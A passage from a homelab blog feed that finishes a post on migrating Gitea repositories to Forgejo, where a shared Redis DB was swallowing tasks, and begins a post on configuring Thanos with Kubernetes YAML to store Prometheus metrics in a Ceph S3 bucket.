to Forgejo. This token can be generated by any user, under <em>User Settings</em> -&gt;
<em>Applications</em>:</p>
<figure>
    <img loading="lazy" src="token-creation.png"
         alt="A screenshot of Gitea&#39;s API token generation form. It is headed &#39;Generate New Token&#39;. After that follows a field labeled &#39;Token Name&#39;, which is filled out with &#39;Forgejo Demo&#39; in this instance. Then follow two radio buttons, headed &#39;Repository and Organization Access&#39;. The two choices are labeled &#39;Public only&#39; and &#39;All (public, private, and limited)&#39;. The &#39;All&#39; one is chosen in the screenshot. Then follows a foldable section labeled &#39;Select permissions&#39; with a series of drop down list choices. In all of them, &#39;Read and Write&#39; is chosen in the screenshot. Finally, there is a &#39;Generate Token&#39; at the very end of the form."/> <figcaption>
            <p>Gitea&rsquo;s API token generation form.</p>
        </figcaption>
</figure>

<p>Once the token is generated, it will be shown at the top of the screen:
<figure>
    <img loading="lazy" src="token-created.png"
         alt="Another screenshot of the token management UI. Now, there is a notice at the top, with a green background, reading &#39;Your new token has been generated. Copy it now as it will not be shown again.&#39;. Below that is another notice with a blue background containing a random string of numbers and letters."/> <figcaption>
            <p>The token shown after generation.</p>
        </figcaption>
</figure>

The token needs to be copied immediately, as it will not be accessible again.</p>
<p>Then I started the migration. Which was when the frustration began. Forgejo&rsquo;s
Gitea migration screen looks like this:
<figure>
    <img loading="lazy" src="migration-form.png"
         alt="A screenshot of Forgejo&#39;s repo migration form for migrating a repo from Gitea to Forgejo. The first field is labeled &#39;Migrate / Clone from URL&#39; and has the value &#39;https://gitea.mei-home.net/mmeier/migration-test.git&#39;. Next comes a field labeled &#39;Access token&#39;, which is starred out here. Then come a couple of checkboxes for migration options. The first one is &#39;this repository will be a mirror&#39;, which is left unchecked. Then comes &#39;Wiki&#39;, also unchecked. Then follow a couple of additional repository features Gitea provides, all of them are checked in the screenshot: &#39;Issues&#39;, &#39;Pull requests&#39;, &#39;Labels&#39;, &#39;Milestones&#39;, &#39;Releases&#39;. Then comes the next section with the configuration of where exactly the repo should be migrated to. The first field is a drop down labeled &#39;Owner&#39;. The chosen value here is &#39;mmeier&#39;. Next is the &#39;Repository name&#39; field, chosen here as &#39;migration-test&#39;. Then a checkbox marked &#39;Make repository private&#39; is checked. A text box labeled &#39;Description&#39; is left empty. At the very bottom sits a button labeled &#39;Migrate repository&#39;."/> <figcaption>
            <p>An example of the migration form.</p>
        </figcaption>
</figure>
</p>
<p>After hitting &ldquo;Migrate repository&rdquo; on the first repo, I got this screen:
<figure>
    <img loading="lazy" src="migration-screen.png"
         alt="A screenshot of Forgejo&#39;s migration screen. It contains Forgejo&#39;s logo of two Git branches and the text &#39;Migration from https://gitea.mei-home.net/mmeier/migration-test.git&#39;. At the bottom is a button labeled &#39;Cancel&#39;."/> <figcaption>
            <p>Forgejo&rsquo;s migration waiting screen.</p>
        </figcaption>
</figure>
</p>
<p>And then nothing further happened. After a while, I hit the &ldquo;Cancel&rdquo; button.
A new modal with yes/no buttons appeared. I hit &ldquo;Yes&rdquo;. Still nothing happened.
I was still on the migration waiting screen. Something had gone wrong. As I could
not cancel, I tried restarting the Forgejo instance. Still the same thing: opening
the repo brought me right back to this screen. I logged out and back in. Still
the same thing. I logged in as admin and checked the repo. Still the same thing.
I finally ended up deleting the repo via the admin interface.</p>
<p>Then I tried again. With exactly the same parameters. And exactly the same results.</p>
<p>Starting to get frustrated, I opened the logs of both Forgejo and Gitea. In the
Forgejo logs, I only saw these lines, repeating ad infinitum:</p>
<pre tabindex="0"><code>2025-05-18 15:35:43.000 router: completed GET /user/task/1 for 10.8.14.218:60046, 200 OK in 48.3ms @ user/task.go:16(user.TaskStatus)
2025-05-18 15:35:42.000 router: completed GET /homelab/homelab for 10.8.14.218:60046, 200 OK in 167.5ms @ repo/view.go:798(repo.Home)
2025-05-18 15:35:42.000 router: completed POST /repo/migrate for 10.8.14.218:60046, 303 See Other in 1266.1ms @ repo/migrate.go:152(repo.MigratePost)
</code></pre><p>In the Gitea logs, I saw a couple of errors though:</p>
<pre tabindex="0"><code>2025-05-18 15:35:43.000 Run task failed: failed to decrypt by secret, the key (maybe SECRET_KEY?) might be incorrect: AesDecrypt invalid decrypted base64 string: illegal base64 data at input byte 0
2025-05-18 15:35:43.000 runMigrateTask[1] by DoerID[2] to RepoID[1] for OwnerID[3] failed: failed to decrypt by secret, the key (maybe SECRET_KEY?) might be incorrect: AesDecrypt invalid decrypted base64 string: illegal base64 data at input byte 0
2025-05-18 15:35:43.000 FinishMigrateTask[1] by DoerID[2] to RepoID[1] for OwnerID[3] failed: failed to decrypt by secret, the key (maybe SECRET_KEY?) might be incorrect: AesDecrypt invalid decrypted base64 string: illegal base64 data at input byte 0
</code></pre><p>I had no idea what was going on here. Why would there be some decryption error?
I was perfectly able to navigate to the repo in the Gitea UI, and I was also
able to clone the repo. I just didn&rsquo;t know what was going on. So I just tried
again. And this time it worked. No indication of any issue.</p>
<p>This pattern repeated for all 78 repos I migrated. Almost every repo required multiple
attempts at migration. Seemingly at random, some would succeed on the first attempt,
while others would require a dozen. And I wasn&rsquo;t able to make any sense of it.</p>
<p>So I just powered through and spent the entirety of my Sunday doing this. It was
very decidedly not fun.</p>
<p>Towards the end, I saw a couple of logs in Gitea like this:</p>
<pre tabindex="0"><code>2025-05-18 23:30:00.000 Run task failed: repository does not exist [id: 194, uid: 0, owner_name: , name: ]
2025-05-18 23:30:00.000 runMigrateTask[194] by DoerID[2] to RepoID[194] for OwnerID[2] failed: repository does not exist [id: 194, uid: 0, owner_name: , name: ]
2025-05-18 23:28:58.000 Run task failed: repository does not exist [id: 192, uid: 0, owner_name: , name: ]
2025-05-18 23:28:58.000 runMigrateTask[192] by DoerID[2] to RepoID[192] for OwnerID[2] failed: repository does not exist [id: 192, uid: 0, owner_name: , name: ]
</code></pre><p>I was getting a bit confused - why was Gitea running migration tasks for repos
which weren&rsquo;t even there? Did Forgejo provide invalid repo IDs in the API
requests?
For some reason, I did not find it weird that Gitea was even running any
migration tasks at all.</p>
<p>But I didn&rsquo;t care very much - I was finally done.</p>
<h2 id="enabling-woodpecker">Enabling Woodpecker</h2>
<p>I next went to migrate my Woodpecker CI over to using Forgejo instead of Gitea.
This was pretty straightforward: I just replaced the Gitea config variables with
the Forgejo ones:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">server</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">WOODPECKER_FORGEJO</span>: <span style="color:#e6db74">&#34;true&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">WOODPECKER_FORGEJO_URL</span>: <span style="color:#e6db74">&#34;https://forgejo.example.com&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">extraSecretNamesForEnvFrom</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">forgejo-secret</span>
</span></span></code></pre></div><p>For full details on how I originally set up Woodpecker with Gitea, have a look
at <a href="https://blog.mei-home.net/posts/k8s-migration-15-ci/">this post</a>. Afterwards, I deleted
my old repo configs and added them anew from Forgejo. I don&rsquo;t think there&rsquo;s any
migration tool to do this, but it was just a half dozen repos, so I didn&rsquo;t mind
too much.</p>
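<p>For completeness: the <code>forgejo-secret</code> referenced above via <code>extraSecretNamesForEnvFrom</code>
holds the OAuth2 application credentials Woodpecker uses to talk to Forgejo. A sketch of what such
a Secret could look like - the variable names are my assumption based on Woodpecker&rsquo;s Forgejo
forge settings, and the values are placeholders:</p>
<pre tabindex="0"><code>apiVersion: v1
kind: Secret
metadata:
  name: forgejo-secret
stringData:
  # OAuth2 client credentials for the Forgejo forge;
  # variable names assumed, values are placeholders.
  WOODPECKER_FORGEJO_CLIENT: &#34;&lt;oauth2-client-id&gt;&#34;
  WOODPECKER_FORGEJO_SECRET: &#34;&lt;oauth2-client-secret&gt;&#34;
</code></pre>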
<p>What I did mind was that CI runs did not always get triggered. Sometimes, a push
event just wouldn&rsquo;t trigger the webhook, and Woodpecker would have no idea that
a push just happened.</p>
<h2 id="issues-with-events-going-missing">Issues with events going missing</h2>
<p>At that point I was starting to think that there was something seriously wrong
with my setup. But I still had no idea what it might be. And I was observing
an additional problem: like Gitea, Forgejo&rsquo;s profile page by default shows a
stream of events, such as pushes to repositories or the creation of issues.
And I was seeing that not all events were showing up there. The pushes themselves
worked; I was able to see the new commits in Forgejo&rsquo;s UI, but it seemed the
event was getting lost somewhere. Which fit the fact that Woodpecker&rsquo;s webhooks
also weren&rsquo;t triggered reliably.</p>
<p>Still with no idea what was going on, I left my Gitea instance running while I
wrote up a ticket in Forgejo&rsquo;s bug tracker, see <a href="https://codeberg.org/forgejo/forgejo/issues/7916">here</a>.
I figured that I could reproduce the problem pretty reliably, and the Gitea
instance wasn&rsquo;t using many resources, so perhaps I could help the Forgejo team
with debugging.</p>
<p>I then got a few comments, all wondering why it looked like Gitea was
running migrations at all. One of them mentioned that it looked like
Gitea and Forgejo were sharing databases. But I was 100% sure that they weren&rsquo;t.</p>
<p>And then it hit me. They weren&rsquo;t sharing Postgres DBs - but they were certainly
sharing a Redis instance, and using it for queuing! So there was my issue. Gitea
thought it was being asked to run migrations on repos it knew nothing about
because it was seeing, and trying to handle, Forgejo&rsquo;s events. And Forgejo&rsquo;s
migrations weren&rsquo;t finishing because the actual migration task was getting
consumed (and then discarded) by Gitea. And that was also where the missing
activity feed events and Woodpecker webhook triggers had gone.</p>
<p>So the issue was entirely homemade. As is only right and proper for a Homelab.</p>
<p>Forgejo is a perfectly fine piece of software and has not given me any grief
at all since I switched it to a different Redis DB by changing the <code>db=0</code> part
of the Redis connection strings to <code>db=1</code>.</p>
<h2 id="conclusion">Conclusion</h2>
<p>The main lesson to take away here: spend more time looking for the fault in your
own setup.</p>
<p>I could have done a lot of other things, especially with those few very frustrating
hours last Sunday. But at least I&rsquo;ve now learned another good lesson: make sure
you put your apps into different Redis DBs when they&rsquo;re sharing an instance.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Setting up Thanos for Metrics Storage</title>
      <link>https://blog.mei-home.net/posts/thanos-setup/</link>
      <pubDate>Sun, 18 May 2025 00:00:42 +0200</pubDate>
      <guid>https://blog.mei-home.net/posts/thanos-setup/</guid>
      <description>I can stop whenever I want.</description>
      <content:encoded><![CDATA[<p>At the time of writing, I have 328 GiB of Prometheus data. When it all started,
I had about 250 GiB. I could stop gathering more data whenever I like. &#x1f605;</p>
<p>So I&rsquo;ve got a lot of Prometheus data. Especially since I started the Kubernetes
cluster - or rather, since I started scraping it - I had to regularly increase the
size of the storage volume for Prometheus. This might very well be due to my
5 year retention. But part of it, as will become clear later, was that some of
the things I was scraping had a 10s scrape interval configured.</p>
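<p>Just to illustrate where such an interval comes from: with the Prometheus Operator, the scrape
interval is set per endpoint in a ServiceMonitor, roughly like this (a sketch with placeholder
names, not one of my actual monitors):</p>
<pre tabindex="0"><code>apiVersion: monitoring.coreos.com/v1
kind: ServiceMonitor
metadata:
  name: some-exporter
spec:
  selector:
    matchLabels:
      app: some-exporter
  endpoints:
    - port: metrics
      interval: 10s   # scraping every 10 seconds adds up quickly
</code></pre>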
<p>So where&rsquo;s all the data coming from?
There are currently 21 hosts with the standard node exporter running. Then there&rsquo;s
the Kubernetes scraping I&rsquo;m doing with <a href="https://github.com/prometheus-community/helm-charts/tree/main/charts/kube-prometheus-stack">kube-prometheus-stack</a>. That gathers a lot of metrics for every single container I&rsquo;ve got running.
I don&rsquo;t know how many those are right now, but at least 196, because that&rsquo;s the
number of Pods which are currently running. Then there&rsquo;s also my Ceph cluster.
And a few more bits and bobs, but I doubt that they contribute very much.</p>
<p>Here&rsquo;s the problem in a single plot:
<figure>
    <img loading="lazy" src="growth-prom-volume.png"
         alt="A screenshot of a Grafana time series plot. It shows the size of my Prometheus volume, starting in March 2024 until today. It starts out slightly below 60 GB and constantly growths from there. Shortly after reaching 100 GB in mid-May 2024, it goes down by about 20 GB, but continues growing linearly after that. For the growth rate, it grew by about 13 GB in July 2024. Around the beginning of 2025 the growth rate seems to accelerate, with &#43;24 GB in April 2025. On May 5th, the size fell off a cliff down to 1.62 GB."/> <figcaption>
            <p>Size of my Prometheus volume.</p>
        </figcaption>
</figure>
</p>
<p>So I was getting a bit tired of regularly having to increase the size of my
Prometheus volume. It highlights the utter ridiculousness of the amount of data
gathering I&rsquo;m doing. &#x1f601;
I needed a solution. I considered drastically reducing my metrics
gathering. The counterpoint: But pretty graphs! So another solution needed to
be found.</p>
<p>Enter <a href="https://thanos.io/">Thanos</a>. Two things drew me to it. First and foremost,
it promised to allow me to dump my metrics data into an S3 bucket. Which is great,
because I would not have to worry about volume size increases anymore. The next
time I run out of storage for the metrics, I would be running out of storage,
period. And thanks to Ceph, I would just need to throw in an additional disk
somewhere should that ever happen. That alone would already be a great advantage
over my current setup. But Thanos also supports downsampling of data. While I do
intentionally keep all data for five years right now, I don&rsquo;t really need that
data in full precision. So this would allow me to reduce my storage usage, without
having to drop data entirely. I will even end up with more retention than before,
just not in full precision.</p>
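<p>To give an idea of what that looks like in practice: retention is configured per resolution on
the Thanos Compactor (more on it in the next section). Here is a sketch of the relevant container
arguments, with the flag names taken from the Thanos compact documentation and the durations purely
illustrative, not my actual settings:</p>
<pre tabindex="0"><code>containers:
  - name: thanos-compact
    image: quay.io/thanos/thanos:v0.38.0   # image tag assumed
    args:
      - compact
      - --wait
      - --objstore.config-file=/etc/thanos/bucket.yml
      - --retention.resolution-raw=1y   # full-precision data
      - --retention.resolution-5m=2y    # 5-minute downsampled data
      - --retention.resolution-1h=5y    # 1-hour downsampled data
</code></pre>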
<h2 id="how-thanos-works">How Thanos works</h2>
<p>Thanos works with multiple components as follows:
<figure>
    <img loading="lazy" src="thanos-overview.svg"
         alt="A diagram showing how Thanos works. On the left side are a couple of squares labeled Kubernetes, Ceph, hosts representing the targets Prometheus, represented by another square, scrapes. The Kubernetes, Ceph, hosts and Prometheus boxes are white. Prometheus, in turn, is connected with an arrow labeled &#39;Gathers Blocks From&#39; to a block called &#39;Thanos Sidecar&#39;. This sidecar then has another arrow indicating that it uploads blocks to S3. A separate square labeled &#39;Thanos Compactor&#39; is only connected to S3, with an arrow labeled &#39;Compact Blocks&#39;. Then there&#39;s the &#39;Thanos Querier&#39; block, connected with arrows labeled &#39;queries&#39; to the &#39;Thanos Sidecar&#39; and &#39;S3&#39;. And finally, another block in white labeled &#39;Grafana&#39; has an arrow towards the &#39;Thanos Querier&#39; labeled &#39;queries&#39;."/> <figcaption>
            <p>Overview of Thanos</p>
        </figcaption>
</figure>
</p>
<p>The components marked in white in the diagram are the original components of my
metrics setup, while the new Thanos components are kept in blue. Thanos starts
out taking the uncompacted blocks from Prometheus&rsquo; storage via the <a href="https://thanos.io/tip/components/sidecar.md/">Thanos Sidecar</a>,
uploading them unchanged to S3. Once the blocks are uploaded, they are downloaded
again by the <a href="https://thanos.io/tip/components/compact.md/">Compactor</a>, whose main job is to compact the blocks, similar to what
Prometheus would do.</p>
<p>Queries against this storage are done by the <a href="https://thanos.io/tip/components/query.md/">Querier</a>. It is not only connected
to the S3 bucket and able to query the blocks there via range requests, but also
to the Sidecar. This is necessary because Prometheus (by default) only creates a
new actual block every two hours. Before that, newly scraped metrics are kept in
the head block. So to get the most recent data, the Querier needs to go to the
Sidecar. For queries over longer intervals, the Querier is able to combine data
from multiple sources.</p>
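<p>To make the wiring a bit more tangible, here is a sketch of what the Querier&rsquo;s container
arguments could look like once both the Sidecar and the Store (more on that below) expose their
gRPC endpoints - the service names are placeholders, not my actual ones:</p>
<pre tabindex="0"><code>containers:
  - name: thanos-query
    args:
      - query
      - --http-address=0.0.0.0:10902
      - --grpc-address=0.0.0.0:10901
      # One --endpoint per gRPC store API: the Sidecar for fresh data,
      # the Store for the blocks already sitting in S3.
      - --endpoint=thanos-sidecar.monitoring.svc.cluster.local:10901
      - --endpoint=thanos-store.monitoring.svc.cluster.local:10901
</code></pre>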
<p>And finally, Grafana is no longer pointed at Prometheus, but instead at the
Thanos Querier. There&rsquo;s also an additional component, the <a href="https://thanos.io/tip/components/query-frontend.md/">Thanos Query Frontend</a>,
that does query distribution and caching. But to be honest, it doesn&rsquo;t look like
I need it right now.</p>
<h2 id="thanos-setup">Thanos setup</h2>
<p>The first step to complete was setting up an S3 bucket, which I did via my
Rook Ceph cluster:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">objectbucket.io/v1alpha1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ObjectBucketClaim</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">bucket-thanos</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">bucketName</span>: {{ <span style="color:#ae81ff">.Values.bucketName }}</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">storageClassName</span>: <span style="color:#ae81ff">rgw-bulk</span>
</span></span></code></pre></div><p>The next step is the setup of the Sidecar. As I&rsquo;m running <a href="https://github.com/prometheus-community/helm-charts/tree/main/charts/kube-prometheus-stack">kube-prometheus-stack</a>
for my monitoring stack and that already provides Thanos integration, I used that.
There are a number of changes necessary in the Prometheus part of the <code>values.yaml</code>
file. First, <code>prometheus.prometheusSpec.disableCompaction: true</code> needs to be set.
That completely disables Prometheus&rsquo; own compaction, which is necessary so Thanos
can take over compaction duties. Then I also set some Thanos related options:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">prometheus</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">thanosService</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">thanosServiceMonitor</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">thanosServiceExternal</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">thanosIngress</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">prometheusSpec</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">disableCompaction</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">thanos</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">objectStorageConfig</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">existingSecret</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">name</span>: <span style="color:#ae81ff">thanos-objectstore-config</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">key</span>: <span style="color:#e6db74">&#34;bucket.yml&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">logFormat</span>: <span style="color:#ae81ff">json</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">additionalArgs</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">shipper.upload-compacted</span>
</span></span></code></pre></div><p>I didn&rsquo;t need any ingress to the Sidecar, so I disabled it. As is my habit, I
also disabled Thanos&rsquo; own metric gathering, at least until I could get around to
properly setting it up and creating some dashboards.</p>
<p>The <code>thanos:</code> section provides the configuration for the Sidecar. It&rsquo;s part of
the Prometheus Operator config, so it&rsquo;s not the kube-prometheus-stack which adds
the Thanos Sidecar, but the Prometheus Operator. The content of the <code>prometheusSpec.thanos</code> key is
copied verbatim into the <a href="https://prometheus-operator.dev/docs/api-reference/api/#monitoring.coreos.com/v1.ThanosSpec">thanos section</a>
of the PrometheusSpec for the Prom operator, so any other options from that
section can also be added  here.</p>
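<p>For example, resource requests or the log level of the Sidecar container can be set in the same
place. A sketch, with the field names taken from the ThanosSpec reference linked above and the
values purely illustrative:</p>
<pre tabindex="0"><code>prometheus:
  prometheusSpec:
    thanos:
      logLevel: info
      resources:
        requests:
          cpu: 100m
        limits:
          memory: 512Mi
</code></pre>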
<p>The <code>shipper.upload-compacted</code> flag for the Thanos Sidecar is required so that
it uploads already compacted blocks to the S3 bucket. Without this option, the
Sidecar will only ever touch uncompacted blocks. As I wanted to move my entire
metrics history to S3, I enabled the option.</p>
<p>The main problem during the setup, as seems to happen so often, was how to
effectively use the S3 config and credentials so helpfully provided by Rook
in the form of a Secret and a ConfigMap. There are two ways of providing the
bucket config to Thanos; both need a <a href="https://thanos.io/tip/thanos/storage.md/#configuring-access-to-object-storage">Thanos-specific config file</a>, either supplied
as an actual file or by providing the file content as a verbatim string parameter
to a command line flag.</p>
<p>Because the ability to provide environment variables to the Sidecar was completely
missing, I opted again for my external-secrets <a href="https://external-secrets.io/latest/provider/kubernetes/">Kubernetes Store</a>
approach to providing the S3 credentials. For details, see <a href="https://blog.mei-home.net/posts/k8s-migration-11-harbor/#issues-with-secrets">this post</a>.
But external-secrets does not allow taking some values from a ConfigMap for the
template, so while I could provide the credentials from the Secret generated by
Rook, I couldn&rsquo;t use the configs from the ConfigMap it also creates and had to
hardcode them:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">external-secrets.io/v1beta1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ExternalSecret</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">thanos-objectstore-config</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">refreshInterval</span>: <span style="color:#e6db74">&#34;10m&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">secretStoreRef</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>: <span style="color:#ae81ff">monitoring-secrets-store</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">kind</span>: <span style="color:#ae81ff">SecretStore</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">target</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>: <span style="color:#ae81ff">thanos-objectstore-config</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">template</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">data</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">bucket.yml</span>: |<span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          type: S3
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          config:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            bucket: thanos
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            endpoint: rook-ceph-rgw-rgw-bulk.example.svc:80
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            disable_dualstack: true
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            aws_sdk_auth: false
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            access_key: {{ `{{ .AWS_ACCESS_KEY_ID }}` }}
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            secret_key: {{ `{{ .AWS_SECRET_ACCESS_KEY }}` }}
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            insecure: true
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            bucket_lookup_type: path</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">dataFrom</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">extract</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">key</span>: <span style="color:#ae81ff">bucket-thanos</span>
</span></span></code></pre></div><p>Once I deployed this configuration, the Sidecar immediately started uploading
the older, already compacted blocks. For the roughly 250 GB worth of metrics data
I had at that point, it took about 4.5h to upload everything.</p>
<p>Next, the deployment of the other Thanos components. I decided to deploy them
into my <code>monitoring</code> namespace, similar to kube-prometheus-stack, because it
allowed me to share the configs and Secret between the Sidecar and the other
components.</p>
<p>The first Thanos standalone component I deployed was the Thanos Store. It serves
as a backend for the Querier, downloading and supplying blocks from the S3 bucket.</p>
<p>Before deploying the Store, I had to define a <a href="https://thanos.io/tip/components/store.md/#index-cache">cache config</a>.
This particular cache is for the indexes of Prometheus blocks. I decided on using
Redis for this, as I&rsquo;ve already got an instance running anyway. My configuration
looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ConfigMap</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">redis-cache-conf</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">data</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">redis-cache.yaml</span>: |<span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    type: REDIS
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    config:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      addr: redis.redis.svc.cluster.local:6379
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      tls_enabled: false
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      cache_size: 256MB
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      max_async_buffer_size: 100000</span>
</span></span></code></pre></div><p>One really annoying thing: The unit of the <code>cache_size</code> doesn&rsquo;t seem to be
documented anywhere. So I went spelunking a little bit. First, I looked up the
<code>cache_size</code> in the <a href="https://github.com/thanos-io/thanos/blob/2a5a856e34adb2653dda700c4d87637236afb2dd/pkg/cacheutil/redis_client.go#L212">Thanos repo</a>:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-golang" data-lang="golang"><span style="display:flex;"><span>	<span style="color:#a6e22e">clientOpts</span> <span style="color:#f92672">:=</span> <span style="color:#a6e22e">rueidis</span>.<span style="color:#a6e22e">ClientOption</span>{
</span></span><span style="display:flex;"><span>		<span style="color:#a6e22e">InitAddress</span>:       <span style="color:#a6e22e">strings</span>.<span style="color:#a6e22e">Split</span>(<span style="color:#a6e22e">config</span>.<span style="color:#a6e22e">Addr</span>, <span style="color:#e6db74">&#34;,&#34;</span>),
</span></span><span style="display:flex;"><span>		<span style="color:#a6e22e">ShuffleInit</span>:       <span style="color:#66d9ef">true</span>,
</span></span><span style="display:flex;"><span>		<span style="color:#a6e22e">Username</span>:          <span style="color:#a6e22e">config</span>.<span style="color:#a6e22e">Username</span>,
</span></span><span style="display:flex;"><span>		<span style="color:#a6e22e">Password</span>:          <span style="color:#a6e22e">config</span>.<span style="color:#a6e22e">Password</span>,
</span></span><span style="display:flex;"><span>		<span style="color:#a6e22e">SelectDB</span>:          <span style="color:#a6e22e">config</span>.<span style="color:#a6e22e">DB</span>,
</span></span><span style="display:flex;"><span>		<span style="color:#a6e22e">CacheSizeEachConn</span>: int(<span style="color:#a6e22e">config</span>.<span style="color:#a6e22e">CacheSize</span>),
</span></span><span style="display:flex;"><span>		<span style="color:#a6e22e">Dialer</span>:            <span style="color:#a6e22e">net</span>.<span style="color:#a6e22e">Dialer</span>{<span style="color:#a6e22e">Timeout</span>: <span style="color:#a6e22e">config</span>.<span style="color:#a6e22e">DialTimeout</span>},
</span></span><span style="display:flex;"><span>		<span style="color:#a6e22e">ConnWriteTimeout</span>:  <span style="color:#a6e22e">config</span>.<span style="color:#a6e22e">WriteTimeout</span>,
</span></span><span style="display:flex;"><span>		<span style="color:#a6e22e">DisableCache</span>:      <span style="color:#a6e22e">clientSideCacheDisabled</span>,
</span></span><span style="display:flex;"><span>		<span style="color:#a6e22e">TLSConfig</span>:         <span style="color:#a6e22e">tlsConfig</span>,
</span></span><span style="display:flex;"><span>	}
</span></span></code></pre></div><p>The <code>rueidis</code> package name in that struct led me to the repo
of the <a href="https://github.com/redis/rueidis/blob/84ae736a8812099d841cd68e4b6b502de08c7a37/cache.go#L15">Redis Go client</a>:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-golang" data-lang="golang"><span style="display:flex;"><span><span style="color:#75715e">// CacheStoreOption will be passed to NewCacheStoreFn</span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">type</span> <span style="color:#a6e22e">CacheStoreOption</span> <span style="color:#66d9ef">struct</span> {
